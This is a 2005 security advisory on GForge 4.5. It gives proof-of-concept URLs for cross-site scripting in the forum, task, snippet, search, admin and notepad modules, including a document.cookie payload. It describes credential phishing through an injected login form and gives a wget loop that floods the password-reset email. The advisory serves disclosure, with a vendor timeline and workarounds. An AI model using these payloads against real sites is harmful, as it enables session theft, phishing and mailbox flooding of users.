gforgeXSS.txt

`---------------------------------------------------------------------------  
Various Vulnerabilities in GForge   
---------------------------------------------------------------------------  
  
Author: Jose Antonio Coret (Joxean Koret)  
Date: 2005  
Location: Basque Country  
  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
GForge - 4.5 (Current)  
  
GForge has tools to help your team collaborate, like message forums and   
mailing lists; tools to create and control access to Source Code  
Management   
repositories like CVS and Subversion. GForge automatically creates a  
repository   
and controls access to it depending on the role settings of the project.  
  
Web : http://gforge.org/  
  
---------------------------------------------------------------------------  
  
A) Cross Site Scripting Vulnerabilities  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1.- In the Forum Module:  
  
http://[target]/forum/forum.php?forum_id="><script>alert('hi')</script>  
http://[target]/forum/forum.php?group_id="><script>alert('hi')</script>  
  
(NOTE: The group_id parameter is ALWAYS vulnerable.)  
  
2.- In the Task Module:  
  
  
http://[target]/pm/task.php?func=detailtask&project_task_id="><h1>hi!</h1>&group_id=1&group_project_id=3  
  
3.- In the Snippets Module:  
  
http://[target]/snippet/detail.php?type=snippet&id=21"><iframe%  
20src=http://www.playboy.com></iframe><font%20size="  
  
4.- In the search engine:  
  
To try it simply enter any valid XSS test such as "><h1>hi!!!</h1> in  
the   
search field and press enter or try the following URL:  
  
http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21%  
3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%  
3E&Search=Search  
  
5.- In other modules:  
  
  
http://[target]//frs/admin/qrs.php?group_id="><script>alert(document.cookie)</script>  
http://[target]/notepad.php?form=parent;%0d%0a-->%0d%  
0a</script><body><h1>hi!</h1></body></html><!--  
  
NOTE: (rows, cols and wrap paremeter are also vulnerables).  
  
6.- In the Login Form:  
  
The login form is also vulnerable to XSS (Cross Site Scripting) attacks.  
This may  
be used to launch phising attacks by sending HTML e-mails (i.e.: saying  
that you need   
to upgrade to the latest GForge version due to a security problem) and  
putting in the   
e-mail an HTML link that points to an specially crafted url that inserts  
an html form   
in the GForge login page and when the user press the login button,  
he/she send the   
credentials to the attackers website.  
  
POC. To "play" with this, simply go to the login page and insert in the  
login field   
then following text:   
  
"><iframe src=http://www.playboy.com></iframe><font size="  
  
B) E-Mail Flood  
~~~~~~~~~~~~~~~  
  
The 'forgot your password?' feature allows a remote user to load a  
certain URL to   
cause the service to send a validation e-mail to the specified user's  
e-mail address.   
There is no limit to the number of messages sent over a period of time,  
so a remote   
user can flood the target user's secondary e-mail address. E-Mail Flood,  
E-Mail bomber.  
  
The following is a "Proof Of Concept" of this vulnerability:  
  
[joxean@nemobox]$ while [ true ]; do  
> wget http://[target]/account/lostpw.php?loginname=joxean  
> done  
  
The "pending account" confirmation e-mail is also vulnerable so, a  
mailicious user can  
flood any e-mail box even if they are not GForge registered users.  
  
  
The fix:  
~~~~~~~~  
  
There is no fix at the moment.  
  
  
Workarounds:  
~~~~~~~~~~~~  
  
There are no workarounds except by using a method to automagically catch  
the XSS  
request such as WASP (available via CVS at  
https://savannah.nongnu.org/wasp) or   
mod_security (available at http://www.modsecurity.org/) for Apache Web  
Servers.  
  
  
Timeline:  
~~~~~~~~~  
  
25-Apr-2005 Vendor contacted  
25-Apr-2005 Initial Vendor response (without interest on fixing bugs)  
25-Apr-2005 Response to vendor  
04-Jun-2005 One XSS bug (not discovered by me) closed without a fix  
23-Jun-2005 Vendor RE-contacted (No response)  
27-Jul-2005 Advisory released  
  
Disclaimer:  
~~~~~~~~~~~  
  
The information in this advisory and any of its demonstrations is  
provided  
"as is" without any warranty of any kind.  
  
I am not liable for any direct or indirect damages caused as a result of  
using the information or demonstrations provided in any part of this  
advisory.   
  
---------------------------------------------------------------------------  
  
Contact:  
~~~~~~~~  
  
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es  
  
  
  
`